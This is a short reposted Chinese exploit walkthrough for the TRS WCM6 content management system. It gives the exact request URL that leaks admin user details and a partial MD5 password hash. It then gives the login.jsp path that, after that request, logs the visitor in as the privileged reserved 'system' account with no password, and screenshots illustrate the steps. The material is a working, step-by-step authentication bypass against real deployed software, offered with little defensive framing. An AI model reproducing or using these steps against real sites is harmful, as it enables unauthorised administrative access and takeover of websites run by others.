转载于:http://www.2cto.com/Article/201302/191261.html
1、由来:建立在 TRS的WCM6可直接获取管理员密码 漏洞的基础上
2、首先访问wcm目录,会自动跳转到登录页面:
![](http://up.2cto.com/2013/0226/20130226100000485.jpg)
3、在网址后加上查看管理员密码的链接:
wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
![](http://up.2cto.com/2013/0226/20130226100000639.jpg)
*之前的漏洞说查看管理员信息的危害不大是因为MD5加密只取半截,并且即使破解还有可能遇到admin账号未启用的问题(截图在后面)。
4、这时我们点击浏览器的后退按钮或在地址栏的网址后面直接输入
wcm/app/login.jsp,这样就绕过权限登录了:
![](http://up.2cto.com/2013/0226/20130226100001290.jpg)
![](http://up.2cto.com/2013/0226/20130226100001689.jpg)
这个system是个什么身份?见下图:
![](http://up.2cto.com/2013/0226/20130226100001664.jpg)
原来是系统保留账号,权限还是比较大的。
附admin账号未开通截图:
![](http://up.2cto.com/2013/0226/20130226100002314.jpg)